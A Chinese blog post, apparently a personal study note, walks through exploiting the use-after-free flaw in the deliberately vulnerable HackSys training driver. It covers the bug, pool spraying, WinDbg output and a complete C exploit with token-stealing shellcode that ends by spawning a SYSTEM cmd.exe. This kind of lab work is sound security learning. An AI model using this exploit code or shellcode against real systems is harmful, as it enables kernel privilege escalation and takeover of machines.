Windows内核漏洞学习-UAF

最新推荐文章于 2022-12-25 01:24:28 发布
最新推荐文章于 2022-12-25 01:24:28 发布
阅读量826 收藏 2
点赞数
分类专栏: 内核漏洞 学习记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38025365/article/details/106242187
版权
0x00:前言

本章所提到的漏洞为UAF(释放后利用),这也是目前我所接触到的第一个复杂一点的内核漏洞。参考文章:

0x01:漏洞原理
NTSTATUS FreeUaFObject() {
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try {
        if (g_UseAfterFreeObject) {
            DbgPrint("[+] Freeing UaF Object\n");
            DbgPrint("[+] Pool Tag: %s\n", STRINGIFY(POOL_TAG));
            DbgPrint("[+] Pool Chunk: 0x%p\n", g_UseAfterFreeObject);

#ifdef SECURE
            // Secure Note: This is secure because the developer is setting
            // 'g_UseAfterFreeObject' to NULL once the Pool chunk is being freed
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);

            g_UseAfterFreeObject = NULL;
#else
            // Vulnerability Note: This is a vanilla Use After Free vulnerability
            // because the developer is not setting 'g_UseAfterFreeObject' to NULL.
            // Hence, g_UseAfterFreeObject still holds the reference to stale pointer
            // (dangling pointer)
            ExFreePoolWithTag((PVOID)g_UseAfterFreeObject, (ULONG)POOL_TAG);
#endif

            Status = STATUS_SUCCESS;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

对比安全版本和不安全的版本,区别在于该free函数将内存指针Free后有没有将原来内存指针置空。这样就会留下一个野指针。UAF的原理,简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。常利用的两个点为:

  • 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。
  • 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题。
0x02:漏洞分析

根据这里的函数

NTSTATUS UseUaFObject() {
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    PAGED_CODE();

    __try {
        if (g_UseAfterFreeObject) {
            DbgPrint("[+] Using UaF Object\n");
            DbgPrint("[+] g_UseAfterFreeObject: 0x%p\n", g_UseAfterFreeObject);
            DbgPrint("[+] g_UseAfterFreeObject->Callback: 0x%p\n", g_UseAfterFreeObject->Callback);
            DbgPrint("[+] Calling Callback\n");

            if (g_UseAfterFreeObject->Callback) {
                g_UseAfterFreeObject->Callback();
            }

            Status = STATUS_SUCCESS;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }

    return Status;
}

这里会调用该UAF对象的回调函数,因此我们只需要:

  • 申请一个UFA对象
  • 释放该UFA对象
  • 再次申请一个伪造的对象占据之前释放的UAF对象的Callback函数位置
  • 利用野指针来调用Callback函数,完成任意代码执行

在做这些事情之前,我想我有必要去了解一下Windows的内存池管理原理,以前接触过Linux的内存管理,关于Windows的我在安全客看到一篇不错的关于池的描述。

现在还有一个问题,就是关于我们释放的UAF对象如果和其他空闲块相邻的话,出于性能的考虑,内存分配器会核并这些块,这样我们就无法再申请到这个块了。为了避免这个情况,我们使用池喷射。在原文里使用了 NtAllocateReserveObject 函数,因为该函数申请的空间与UAF对象大小很接近。要使用它,我们需要使用GetProAd’d’ress来获取该函数地址并调用。至于如何调用

该函数可以创建一个大小为0x60的对象并返回一个函数句柄,只要句柄不释放,则该对象会一直保存在内存池中。接下来会首先创建10000个对象用于填充碎块化内容池空间,5000个对象连在一起。然后释放第二次申请的5000个对象中的偶数对象来在非分页内存池上挖坑。这样做的目的是为了让每个块都被两个已分配的内存包围,导致它们在释放时不会被合并。在分配完UAF对象处下断点

kd> g
****** HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT ******
****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ******
[+] Freeing UaF Object
[+] Pool Tag: 'kcaH'
[+] Pool Chunk: 0x85EBCD08
****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ******
****** HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT ******
[+] Allocating UaF Object
[+] Pool Tag: 'kcaH'
[+] Pool Type: NonPagedPool
[+] Pool Size: 0x58
[+] Pool Chunk: 0x85EC9E88
[+] UseAfterFree Object: 0x85EC9E88
[+] g_UseAfterFreeObject: 0x85EC9E88
[+] UseAfterFree->Callback: 0x8E2E22A4
Breakpoint 1 hit
HEVD!AllocateUaFObject+0xfb:
8e2e23b1 c3              ret
kd> !pool
Please provide pool address to dump pool.
kd> !pool 0x85EC9E88
Pool page 85ec9e88 region is Nonpaged pool
 85ec9000 size:   60 previous size:    0  (Free )  IoCo (Protected)
 85ec9060 size:   40 previous size:   60  (Free)       ....
 85ec90a0 size:   60 previous size:   40  (Allocated)  IoCo (Protected)
 85ec9100 size:   60 previous size:   60  (Free)       IoCo
 85ec9160 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec91c0 size:   60 previous size:   60  (Free)       IoCo
 85ec9220 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9280 size:   60 previous size:   60  (Free)       IoCo
 85ec92e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9340 size:   60 previous size:   60  (Free)       IoCo
 85ec93a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9400 size:   60 previous size:   60  (Free)       IoCo
 85ec9460 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec94c0 size:   60 previous size:   60  (Free)       IoCo
 85ec9520 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9580 size:   60 previous size:   60  (Free)       IoCo
 85ec95e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9640 size:   60 previous size:   60  (Free)       IoCo
 85ec96a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9700 size:   60 previous size:   60  (Free)       IoCo
 85ec9760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec97c0 size:   60 previous size:   60  (Free)       IoCo
 85ec9820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9880 size:   60 previous size:   60  (Free)       IoCo
 85ec98e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9940 size:   60 previous size:   60  (Free)       IoCo
 85ec99a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9a00 size:   60 previous size:   60  (Free)       IoCo
 85ec9a60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9ac0 size:   60 previous size:   60  (Free)       IoCo
 85ec9b20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9b80 size:   60 previous size:   60  (Free)       IoCo
 85ec9be0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9c40 size:   60 previous size:   60  (Free)       IoCo
 85ec9ca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9d00 size:   60 previous size:   60  (Free)       IoCo
 85ec9d60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9dc0 size:   60 previous size:   60  (Free)       IoCo
 85ec9e20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
*85ec9e80 size:   60 previous size:   60  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85ec9ee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 85ec9f40 size:   60 previous size:   60  (Free )  IoCo (Protected)
 85ec9fa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

在结果里可以看到申请的Hack块被夹在两个正在使用的IOCO对象块中间,这样就可以保证它在释放的时候不被回收了。

(这里说一个调试错误修复,一开始使用!pool命令会报错,需要使用!poolval命令来修复,百度查不到还是谷歌给力。。另外还知道了Windbg的命令直接在MSDN官方查就可以了…我还是无知)

接下来要做的就是进行写shellcode了。在 写的时候,申请5000个大小为0x60的池块,都将回调函数的地址处填写为shellcode,这样更大概率可以进行野指针的覆盖。

最终运行完整的代码,可以看到该地址被覆盖为了Shellcode地址。

在这里插入图片描述

同时在执行call时也看到了eax为存放shellcode的地址。

完整代码
#include<stdio.h>
#include<Windows.h>

#define IO_COMPLETION_OBJECT 1
#define STATUS_SUCCESS 0
typedef void(*FunctionPointer) ();

typedef struct _LSA_UNICODE_STRING {
	USHORT Length;
	USHORT MaximumLength;
	PWSTR  Buffer;
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
	ULONG           Length;
	HANDLE          RootDirectory;
	PUNICODE_STRING ObjectName;
	ULONG           Attributes;
	PVOID           SecurityDescriptor;
	PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef NTSTATUS(WINAPI* NtAllocateReserveObject_t)(OUT PHANDLE           hObject,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	IN DWORD              ObjectType);

typedef struct _FAKE_USE_AFTER_FREE
{
	FunctionPointer countinter;
	char bufffer[0x54];
}FAKE_USE_AFTER_FREE, * PUSE_AFTER_FREE;
HANDLE    ReserveObjectArrayA[10000];
HANDLE    ReserveObjectArrayB[5000];
__declspec(naked) VOID ShellCode()
{
	_asm
	{
		nop
		pushad
		mov eax, fs: [124h]		// 找到当前线程的_KTHREAD结构
		mov eax, [eax + 0x50]   // 找到_EPROCESS结构
		mov ecx, eax
		mov edx, 4				// edx = system PID(4)

		// 循环是为了获取system的_EPROCESS
		find_sys_pid :
		mov eax, [eax + 0xb8]	// 找到进程活动链表
		sub eax, 0xb8    		// 链表遍历
		cmp[eax + 0xb4], edx    // 根据PID判断是否为SYSTEM
		jnz find_sys_pid

		// 替换Token
		mov edx, [eax + 0xf8]
		mov[ecx + 0xf8], edx
		popad
		ret
	}
}

static VOID CreateCmd()
{
	STARTUPINFO si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };
	si.dwFlags = STARTF_USESHOWWINDOW;
	si.wShowWindow = SW_SHOW;
	WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
	BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
	if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}


int main()
{
	int NtStatus = 0;
	DWORD recvBuf;
	// 获取句柄
	HANDLE hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
		GENERIC_READ | GENERIC_WRITE,
		NULL,
		NULL,
		OPEN_EXISTING,
		NULL,
		NULL);

	printf("Start to get HANDLE...\n");
	if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
	{
		printf("获取句柄失败\n");
		return 0;
	}

	//进行池喷射
	NtAllocateReserveObject_t     NtAllocateReserveObject;
	HMODULE hModule = NULL;
	hModule = LoadLibraryA("ntdll.dll");
	if (!hModule) {
		printf("\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}
	NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(hModule, "NtAllocateReserveObject");
	if (!NtAllocateReserveObject) {
		printf("\t\t[-] Failed Resolving NtAllocateReserveObject: 0x%X\n", GetLastError());
		exit(EXIT_FAILURE);
	}
	int i = 0;
	for (i = 0; i < 10000; i++) {
		NtStatus = NtAllocateReserveObject(&ReserveObjectArrayA[i], 0, IO_COMPLETION_OBJECT);
		if (NtStatus != STATUS_SUCCESS) {
			printf("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
	}
	for (i = 0; i < 5000; i++) {
		NtStatus = NtAllocateReserveObject(&ReserveObjectArrayB[i], 0, IO_COMPLETION_OBJECT);
		if (NtStatus != STATUS_SUCCESS) {
			printf("\t\t[-] Failed To Allocate Reserve Objects: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
	}
		//释放偶数个的内存块
	for (i = 0; i < 5000; i += 2) {
		if (!CloseHandle(ReserveObjectArrayB[i])) {
			printf("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
			exit(EXIT_FAILURE);
		}
	}


		// 调用 AllocateUaFObject() 函数申请内存
		printf("Start to call AllocateUaFObject()...\n");
		DeviceIoControl(hDevice, 0x222013, NULL, NULL, NULL, 0, &recvBuf, NULL);

		// 调用 FreeUaFObject() 函数释放对象
		printf("Start to call FreeUaFObject()...\n");
		DeviceIoControl(hDevice, 0x22201B, NULL, NULL, NULL, 0, &recvBuf, NULL);

		for (i = 0; i < 10000; i++) {
			if (!CloseHandle(ReserveObjectArrayA[i])) {
				printf("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
				exit(EXIT_FAILURE);
			}
		}

		for (i = 1; i < 5000; i += 2) {
			if (!CloseHandle(ReserveObjectArrayB[i])) {
				printf("\t\t[-] Failed To Close Reserve Objects Handle: 0x%X\n", GetLastError());
				exit(EXIT_FAILURE);
			}
		}
		printf("Start to write shellcode()...地址为0x%p\n",ShellCode);
		//申请假的chunk
		PUSE_AFTER_FREE fakeG_UseAfterFree = (PUSE_AFTER_FREE)malloc(sizeof(FAKE_USE_AFTER_FREE));
		//指向我们的shellcode
		fakeG_UseAfterFree->countinter = ShellCode;
		//用A填满该chunk
		RtlFillMemory(fakeG_UseAfterFree->bufffer, sizeof(fakeG_UseAfterFree->bufffer), 'A');

		// 堆喷射
		printf("***********************************\n");
		printf("Start to heap spray...\n");
		for (int i = 0; i < 5000; i++)
		{
			DeviceIoControl(hDevice, 0x22201F, fakeG_UseAfterFree, 0x60, NULL, 0, &recvBuf, NULL);
		}
		printf("Start to call UseUaFObject()...\n");
		DeviceIoControl(hDevice, 0x222017, NULL, NULL, NULL, 0, &recvBuf, NULL);

		printf("Start to create cmd...\n");
		CreateCmd();

		return 0;
	
}
0x03:明日计划

继续学习漏洞利用

Wwoc
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
驱动开发:内核监控进程与线程回调
m0_56069948的博客
10-23 604
系统中监控进程与线程可以使用微软提供给我们的两个新函数来实现,此类函数的原理是创建一个回调事件,当有进程或线程被创建或者注销时,系统会通过回调机制将该进程相关信息优先返回给我们自己的函数待处理结束后再转向系统层。那么会提示连接的设备没有发挥作用,我们则成功拦截了这次打开,当然如果在打开进程之前扫描其特征并根据特征拒绝进程打开,那么就可以实现一个简单的防恶意程序,进程监控在防恶意程序中也是用的最多的。如上,该函数只有两个参数,第一个参数是回调函数,第二个参数是是否注销,通常在驱动退出时可以传入。
遍历进程内存
qq_41490873的博客
11-30 994
// inject.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include<Windows.h> #include <stdio.h> #define STATUS_UNSUCCESSFUL (0xc0000001) #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 #define NT_SUCCESS(x) ((x) >= 0) typedef enum _PROCESSINFOCLAS
驱动程序DDK返回值类型NTSTATUS常见含义
苞米地里捉小鸡的博客
06-12 1825
STATUS_SUCCESS 函数执行成功 STATUS_UNSUCCESSFUL 函数执行不成功 STATUS_NOT_IMPLEMENTED 函数未被实现 STATUS_INVALID_INFO_CLASS 输入参数是无效的类型 STATUS_INFO_LENGTH_MISMATCH 输入参数长度不匹配 STATUS_ACCESS_VIOLATION 不允许访问 STATUS_IN_PAGE_ERROR 发生页故障 STATUS_IN
Windows内核漏洞学习笔记
weixin_41487541的博客
05-13 869
通常情况下,操作系统的内核程序、驱动程序等都是在0环上运行的。漏洞的攻防一直是此起彼伏的状态,驱动也可以作为病毒木马的载体。此篇仅作为学习记录是自己加深对内核漏洞的理解。 0 驱动程序 0day中的驱动程序exploitme: #include <ntddk.h> #define DEVICE_NAME L"\\Device\\ExploitMe" #define DEVICE_LINK L"\\DosDevices\\ExploitMe" #defi...
lightfactor-uaf
04-30
Lightfactor UAF身份验证库 lightfactor-uaf是库,为UAF操作提供注册,注销,身份验证和交易确认支持。 它旨在与提供HTTPS服务器到该库的lightfactor-engine结合使用。 Lightfactor身份引擎(lightfactor-uaf和...
CVE-2018-17182:Linux内核VMA-UAF提权突破(CVE-2018-17182),0天
03-20
Google Project Zero的网络安全研究人员发布了详细信息,并针对自内核版本3.16至4.18.8以来Linux内核中存在的高严重性漏洞的概念验证(PoC)漏洞利用。 由白帽黑客Jann Horn发现,内核突破(CVE-2018-17182)是Linux...
FIDO-UAF协议
12-30
FIDO-UAF协议官方文档,FIDO协议是目前国际范围内最火的统一认证协议
TI-UAF42.pdf
12-06
【TI-UAF42.pdf】是一款由德州仪器(Texas Instruments)推出的通用有源滤波器芯片,型号为UAF42。该芯片设计灵活,能够配置成多种类型的滤波器,包括低通、高通、带通以及带阻滤波器。其内部采用经典的模拟状态变量...
eID_fido-uaf-core
05-14
标题 "eID_fido-uaf-core" 暗示了这是一个与电子身份证(eID)相关的项目,它利用了FIDO UAF(Universal Authentication Framework)核心技术。FIDO UAF是一种安全的身份验证标准,旨在提供强认证,以保护用户免受...
linux内核UAF漏洞分析之CVE-2018-17182
yiduoxiaoxx的博客
02-26 2010
1.漏洞原理分析 1.1 vma缓存机制 vma就是虚拟地址区域(virtual memory area),内核用vma来管理进程分配的虚拟内存地址。vma在内核中用结构体struct vm_ares_struct 表示,定义如下: struct vm_area_struct { unsigned long vm_start; // 起始虚拟地址 unsig...
常见文件文件头
热门推荐
Xerath的博客
10-01 5万+
各类文件的文件头标志 1、从Ultra-edit-32中提取出来的 JPEG (jpg),文件头:FFD8FF PNG (png),文件头:89504E47 GIF (gif),文件头:47494638 TIFF (tif),文件头:49492A00 Windows Bitmap (bmp),文件头:424D CAD (dwg),文件头:41433130 Adobe Photosh
2008-11-30 15:14 fedora9下的samba若干问题解决
yangruibao的专栏
07-09 8982
http://hi.baidu.com/caicry/item/82a1cff5712690d643c36a71   环境说明 fedora 9 + Vmware Player + samba 3.2.0 问题一:   >star@star-desktop:~$ smbclient -L 192.168.36.133     >Error connecting to 192.168.3
驱动错误返回值学习笔记
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
10-10 1290
说明:ntstatus.h文件所在路径C:\WinDDK\7600.16385.1\inc\api 今天看了一个ntstatus.h头文件中关于驱动中返回值的一些资料,为今后调试驱动返回错误值作一些准备, 0x40000000这个范围内的表示是信息Informational    #define STATUS_OBJECT_NAME_EXISTS        ((NTSTATUS)0
x86下windbg查看SSDT表与SHDOWSSDT
kernweak的博客
05-23 1924
x64下这两个表是未导出的,不能用这种 首先系统符号要加载 SSDT表: x nt!kes*des*table* kd> x nt!KeServiceDes* 83f74a00 nt!KeServiceDescriptorTableShadow = <no type information> 83f749c0 nt!KeServiceDescriptorTable = ...
Linux 二进制漏洞挖掘入门系列之(五)UAF 漏洞分析与利用
个人笔记
03-05 2274
UAF 0x10 UAF(Use After Free) 漏洞原理 这里,需要先介绍一下堆分配内存的原则。ptmalloc 是 glibc 的堆管理器,前身是 dlmalloc,Linux 中进程分配内存的两种方式:brk 和 mmap。当程序使用 malloc 申请内存的时候,如果小于 128K,使用 brk 方式,将数据段(.data)的最高地址指针_edata往高地址推;如果大于 128K...
UAF漏洞利用原理分析
最新发布
qq_29317353的博客
12-25 884
二进制安全,UAF漏洞分析学习
pwnable.kr-uaf WP
Casuall的博客
06-22 506
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
FIDO-UAF协议详解:构建强大的用户认证框架
"FIDO-UAF协议是FIDO联盟提出的一种强认证框架,旨在让在线服务和网站能够利用用户计算设备的内置安全特性进行强大的用户身份验证,减少创建和记忆多个在线凭证的问题。此协议标准由FIDO联盟成员如RSA、Google、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值